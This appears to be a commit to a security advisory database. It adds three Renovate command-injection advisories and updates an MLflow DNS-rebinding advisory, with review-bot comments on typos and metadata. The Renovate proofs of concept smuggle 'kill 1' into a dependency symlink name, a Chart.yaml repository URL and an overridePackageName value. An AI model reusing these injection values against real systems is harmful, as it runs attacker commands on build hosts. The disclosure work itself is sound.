
Commit f0d1ae5

1 parent 278e63d commit f0d1ae5

5 files changed

Lines changed: 253 additions & 4 deletions


Lines changed: 55 additions & 0 deletions
@@ -0,0 +1,55 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-36j9-mx87-2cff",
4+
"modified": "2026-01-13T20:28:41Z",
5+
"published": "2026-01-13T20:28:41Z",
6+
"aliases": [],
7+
"summary": "Renovate vulnerable to arbitrary command injection via hermit manager and maliciously named dependencies",
8+
"details": "### Summary\nThe user-provided string `depName` in the `hermit` manager is appended to the `./hermit install` and `./hermit uninstall` commands without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously named hermit dependency in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.\nAll values added to the `packagesToInstall` and `packagesToUninstall` variables in [lib/modules/manager/hermit/artifacts.ts](https://github.com/renovatebot/renovate/blob/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c/lib/modules/manager/hermit/artifacts.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization for installing packages has been present in the product since the introduction of the hermit manager in version 32.135.0 (https://github.com/renovatebot/renovate/commit/b696abb3c2741508fbb4029f39153140a3722e1e), released on July 30 of 2022.\nIn version 37.199.1 (https://github.com/renovatebot/renovate/commit/eaec10d7c8afadbdd783ac47bd2adbfab444d6df) some use of the `quote` function from the `shlex` package was added, but not in a way that usefully prevented this arbitrary code injection vulnerability.\nWhen support for replacements was introduced with version 37.214.4 (https://github.com/renovatebot/renovate/commit/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c), the same faulty approach was replicated for uninstalling packages.\n\n### PoC\n1. 
Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n customDatasources: {\n always: {\n defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n transformTemplates: ['{\"releases\":[{\"version\":\"99999.0.0\"}]}'],\n },\n },\n packageRules: [\n {\n // Target of the day\n matchManagers: [\"hermit\"],\n // Trick the manager in believing there's a new version\n overrideDatasource: \"custom.always\",\n },\n ],\n}\n\n```\n\n\n`bin/hermit`:\n\n```bash\n#!/bin/bash\n#\n# THIS FILE IS GENERATED; DO NOT MODIFY\n\nset -eo pipefail\n\nexport HERMIT_USER_HOME=~\n\nif [ -z \"${HERMIT_STATE_DIR}\" ]; then\n case \"$(uname -s)\" in\n Darwin)\n export HERMIT_STATE_DIR=\"${HERMIT_USER_HOME}/Library/Caches/hermit\"\n ;;\n Linux)\n export HERMIT_STATE_DIR=\"${XDG_CACHE_HOME:-${HERMIT_USER_HOME}/.cache}/hermit\"\n ;;\n esac\nfi\n\nexport HERMIT_DIST_URL=\"${HERMIT_DIST_URL:-https://github.com/cashapp/hermit/releases/download/stable}\"\nHERMIT_CHANNEL=\"$(basename \"${HERMIT_DIST_URL}\")\"\nexport HERMIT_CHANNEL\nexport HERMIT_EXE=${HERMIT_EXE:-${HERMIT_STATE_DIR}/pkg/hermit@${HERMIT_CHANNEL}/hermit}\n\nif [ ! 
-x \"${HERMIT_EXE}\" ]; then\n echo \"Bootstrapping ${HERMIT_EXE} from ${HERMIT_DIST_URL}\" 1>&2\n INSTALL_SCRIPT=\"$(mktemp)\"\n # This value must match that of the install script\n INSTALL_SCRIPT_SHA256=\"09ed936378857886fd4a7a4878c0f0c7e3d839883f39ca8b4f2f242e3126e1c6\"\n if [ \"${INSTALL_SCRIPT_SHA256}\" = \"BYPASS\" ]; then\n curl -fsSL \"${HERMIT_DIST_URL}/install.sh\" -o \"${INSTALL_SCRIPT}\"\n else\n # Install script is versioned by its sha256sum value\n curl -fsSL \"${HERMIT_DIST_URL}/install-${INSTALL_SCRIPT_SHA256}.sh\" -o \"${INSTALL_SCRIPT}\"\n # Verify install script's sha256sum\n openssl dgst -sha256 \"${INSTALL_SCRIPT}\" | \\\n awk -v EXPECTED=\"$INSTALL_SCRIPT_SHA256\" \\\n '$2!=EXPECTED {print \"Install script sha256 \" $2 \" does not match \" EXPECTED; exit 1}'\n fi\n /bin/bash \"${INSTALL_SCRIPT}\" 1>&2\nfi\n\nexec \"${HERMIT_EXE}\" --level=fatal exec \"$0\" -- \"$@\"\n\n```\n\n\n`bin/.|| kill 1 ||@0.0.1.pkg` (symlink):\n\nA symlink to `hermit`\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual hermit-packages repository during resolution.\n\n### Impact\nTThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "npm",
19+
"name": "renovate"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "32.135.0"
27+
},
28+
{
29+
"fixed": "40.33.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-36j9-mx87-2cff"
40+
},
41+
{
42+
"type": "PACKAGE",
43+
"url": "https://github.com/renovatebot/renovate"
44+
}
45+
],
46+
"database_specific": {
47+
"cwe_ids": [
48+
"CWE-77"
49+
],
50+
"severity": "MODERATE",
51+
"github_reviewed": true,
52+
"github_reviewed_at": "2026-01-13T20:28:41Z",
53+
"nvd_published_at": null
54+
}
55+
}
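Review bot: the Impact paragraph inside the "details" string carries two typos that will be published verbatim: "TThis is a Arbitrary Command Injection vulnerability" should read "This is an Arbitrary Command Injection vulnerability", and "in conjunctions with a tweaked Renovate configuration file" in the Details paragraph should be "in conjunction with". Separately, the same text describes the trigger as write access to a scanned repository leading to command execution on the machine running Renovate, while the "score" line records `AV:L/AC:L/PR:H`; worth confirming that vector is intentional, since the "severity": "MODERATE" value follows directly from it (6.7, Medium, under CVSS 3.1). The "references" array also lists only the advisory and PACKAGE URLs: the Details paragraph links the introducing commits, but the release named in "fixed": "40.33.0" has no reference entry of its own.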
Lines changed: 55 additions & 0 deletions
@@ -0,0 +1,55 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-3f44-xw83-3pmg",
4+
"modified": "2026-01-13T20:29:12Z",
5+
"published": "2026-01-13T20:29:12Z",
6+
"aliases": [],
7+
"summary": "Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file",
8+
"details": "### Summary\nThe user-provided string `repository` in the `helmv3` manager is appended to the `helm registry login` command without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously crafted `Chart.yaml` in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.\nThe value for both uses of the `repository` variable in [lib/modules/manager/helmv3/common.ts](https://github.com/renovatebot/renovate/blob/b69416ce1745f67c9fc1d149738e2f52feb4f732/lib/modules/manager/helmv3/common.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 31.51.0 (https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432), released on January 24 of 2022.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n customDatasources: {\n always: {\n defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n transformTemplates: ['{\"releases\":[{\"version\":\"99999.0.0\"}]}'],\n },\n },\n // Register any credentials to make the manager attempt to use basic auth for the Helm registry\n hostRules: [\n {\n matchHost: \"charts.bitnami.com\",\n username: \"un\",\n password: \"pw\",\n },\n ],\n packageRules: [\n {\n // Target of the day\n matchManagers: [\"helmv3\"],\n // Don't consult the actual bitnami repo\n registryUrls: [],\n // But still, trick the manager in believing there's a new version\n overrideDatasource: \"custom.always\",\n },\n ],\n}\n\n```\n\n\n`Chart.yaml`:\n\n```yaml\napiVersion: v2\nname: renovate-aci-1\nversion: 0.0.1\ndependencies:\n - name: redis\n version: 0.1.0\n repository: oci://charts.bitnami.com/bitnami || kill 1\n\n```\n\n\n`Chart.lock`:\n\n```yaml\ndependencies:\n- name: redis\n repository: 
oci://charts.bitnami.com/bitnami\n```\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.\n\n### Impact\nThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "npm",
19+
"name": "renovate"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "31.51.0"
27+
},
28+
{
29+
"fixed": "40.33.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-3f44-xw83-3pmg"
40+
},
41+
{
42+
"type": "PACKAGE",
43+
"url": "https://github.com/renovatebot/renovate"
44+
}
45+
],
46+
"database_specific": {
47+
"cwe_ids": [
48+
"CWE-77"
49+
],
50+
"severity": "MODERATE",
51+
"github_reviewed": true,
52+
"github_reviewed_at": "2026-01-13T20:29:12Z",
53+
"nvd_published_at": null
54+
}
55+
}
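Review bot: the "details" string has grammar slips that will render as-is on the advisory page: "The value for both uses of the `repository` variable ... are not being escaped" needs "values ... are" (or "value ... is"), "in conjunctions with" should be "in conjunction with", and the Impact paragraph's "This is a Arbitrary Command Injection vulnerability" should read "an". The affected range is consistent with the prose: "introduced": "31.51.0" matches "present in the product since version 31.51.0" and the linked commit, and "fixed": "40.33.0" is the same fix release used by the other two advisories in this commit, so no change needed there.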
Lines changed: 55 additions & 0 deletions
@@ -0,0 +1,55 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-fr4j-65pv-gjjj",
4+
"modified": "2026-01-13T20:28:16Z",
5+
"published": "2026-01-13T20:28:16Z",
6+
"aliases": [],
7+
"summary": "Renovate vulnerable to arbitrary command injection via npm manager and malicious Renovate configuration",
8+
"details": "### Summary\nThe user-provided string `packageName` in the `npm` manager is appended to the `npm install` command during lock maintenance without proper sanitization.\n\n\n### Details\nAdversaries can provide a maliciously crafted Renovate configuration file to trick Renovate to execute arbitrary code.\nThe user-provided workspace names and package keys that are added to the `updateCmd` variables in [lib/modules/manager/npm/post-update/npm.ts](https://github.com/renovatebot/renovate/blob/5bdaf47eebde770107017c47557bca41189db588/lib/modules/manager/npm/post-update/npm.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 35.63.0 (https://github.com/renovatebot/renovate/commit/012c0ac2fe32832e60a62bde405c0a241efd314c), released on April 27 of 2023.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n customDatasources: {\n always: {\n defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n transformTemplates: ['{\"releases\":[{\"version\":\"11.1.0\"}]}'],\n },\n },\n packageRules: [\n {\n // Target of the day\n matchManagers: [\"npm\"],\n // Provide a command in the package name\n overridePackageName: \"; kill 1; echo \",\n // Override the datasource to prevent a lookup failure\n overrideDatasource: \"custom.always\",\n },\n ],\n}\n\n```\n\n\n`package.json`:\n\n```json\n{\n \"name\": \"renovate-aci-4\",\n \"version\": \"0.0.1\",\n \"dependencies\": {\n \"uuid\": \"^11.0.0\"\n }\n}\n```\n\n\n`package-lock.json`:\n\n```json\n{\n \"name\": \"renovate-aci-4\",\n \"version\": \"0.0.1\",\n \"lockfileVersion\": 3,\n \"requires\": true,\n \"packages\": {\n \"\": {\n \"name\": \"renovate-aci-4\",\n \"version\": \"0.0.1\",\n \"dependencies\": {\n \"uuid\": \"^11.0.0\"\n }\n },\n \"node_modules/uuid\": {\n \"version\": 
\"11.0.0\",\n \"resolved\": \"https://registry.npmjs.org/uuid/-/uuid-11.0.0.tgz\",\n \"integrity\": \"sha512-iE8Fa5fgBY4rN5GvNUJ8TSwO1QG7TzdPfhrJczf6XJ6mZUxh/GX433N70fCiJL9h8EKP5ayEIo0Q6EBQGWHFqA==\",\n \"funding\": [\n \"https://github.com/sponsors/broofa\",\n \"https://github.com/sponsors/ctavan\"\n ],\n \"license\": \"MIT\",\n \"bin\": {\n \"uuid\": \"dist/esm/bin/uuid\"\n }\n }\n }\n}\n\n```\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept relies on the introduction of the `overrideDatasource` and `overridePackageName` configuration, available since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024.\n\n### Impact\nThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "npm",
19+
"name": "renovate"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "35.63.0"
27+
},
28+
{
29+
"fixed": "40.33.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-fr4j-65pv-gjjj"
40+
},
41+
{
42+
"type": "PACKAGE",
43+
"url": "https://github.com/renovatebot/renovate"
44+
}
45+
],
46+
"database_specific": {
47+
"cwe_ids": [
48+
"CWE-77"
49+
],
50+
"severity": "MODERATE",
51+
"github_reviewed": true,
52+
"github_reviewed_at": "2026-01-13T20:28:16Z",
53+
"nvd_published_at": null
54+
}
55+
}
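Review bot: the Impact paragraph in "details" repeats the "This is a Arbitrary Command Injection vulnerability" wording from the other two advisories (should be "an"), and the Summary paragraph is followed by three consecutive "\n" before "### Details", which renders as an extra blank line compared with the sibling advisories; both are one-word fixes in the string. The version metadata reads correctly: "introduced": "35.63.0" matches "present in the product since version 35.63.0" and its commit link, and the PoC note explicitly states that the `overrideDatasource` / `overridePackageName` prerequisites only date from 38.120.0, so starting the affected range at 35.63.0 rather than 38.120.0 is the deliberate, conservative choice.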

advisories/unreviewed/2026/01/GHSA-pgqp-8h46-6x4j/GHSA-pgqp-8h46-6x4j.json renamed to advisories/github-reviewed/2026/01/GHSA-pgqp-8h46-6x4j/GHSA-pgqp-8h46-6x4j.json

Lines changed: 33 additions & 4 deletions
@@ -1,28 +1,57 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-pgqp-8h46-6x4j",
4-
"modified": "2026-01-12T09:30:31Z",
4+
"modified": "2026-01-13T20:30:03Z",
55
"published": "2026-01-12T09:30:31Z",
66
"aliases": [
77
"CVE-2025-14279"
88
],
9+
"summary": "MLFlow is vulnerable to DNS rebinding attacks due to a lack of Origin header validation",
910
"details": "MLFlow versions up to and including 3.4.0 are vulnerable to DNS rebinding attacks due to a lack of Origin header validation in the MLFlow REST server. This vulnerability allows malicious websites to bypass Same-Origin Policy protections and execute unauthorized calls against REST endpoints. An attacker can query, update, and delete experiments via the affected endpoints, leading to potential data exfiltration, destruction, or manipulation. The issue is resolved in version 3.5.0.",
1011
"severity": [
1112
{
1213
"type": "CVSS_V3",
1314
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
1415
}
1516
],
16-
"affected": [],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "mlflow"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "3.5.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
1738
"references": [
1839
{
1940
"type": "ADVISORY",
2041
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14279"
2142
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/mlflow/mlflow/pull/17910"
46+
},
2247
{
2348
"type": "WEB",
2449
"url": "https://github.com/mlflow/mlflow/commit/b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3"
2550
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/mlflow/mlflow"
54+
},
2655
{
2756
"type": "WEB",
2857
"url": "https://huntr.com/bounties/ef478f72-2e4f-44dc-8055-fc06bef03108"
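Review bot: the new "summary" line spells the project "MLFlow", as does the existing "details" text; the project's own name is "MLflow" (lower-case f), consistent with the PACKAGE URL path `github.com/mlflow/mlflow` added in this hunk, and since the summary is the headline shown in listings it is worth normalising at least that line. The populated "affected" block agrees with the prose ("up to and including 3.4.0 ... resolved in version 3.5.0"): "introduced": "0" and "fixed": "3.5.0" cover exactly the described range, and the added PR and PACKAGE references give readers a path to the fix. Minor: the unchanged "score" line uses "CVSS:3.0" while the three advisories added in this commit use "CVSS:3.1"; keep 3.0 only if that is the vector string as published by the referenced NVD entry for CVE-2025-14279.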
@@ -33,8 +62,8 @@
3362
"CWE-346"
3463
],
3564
"severity": "HIGH",
36-
"github_reviewed": false,
37-
"github_reviewed_at": null,
65+
"github_reviewed": true,
66+
"github_reviewed_at": "2026-01-13T20:30:03Z",
3867
"nvd_published_at": "2026-01-12T09:15:50Z"
3968
}
4069
}
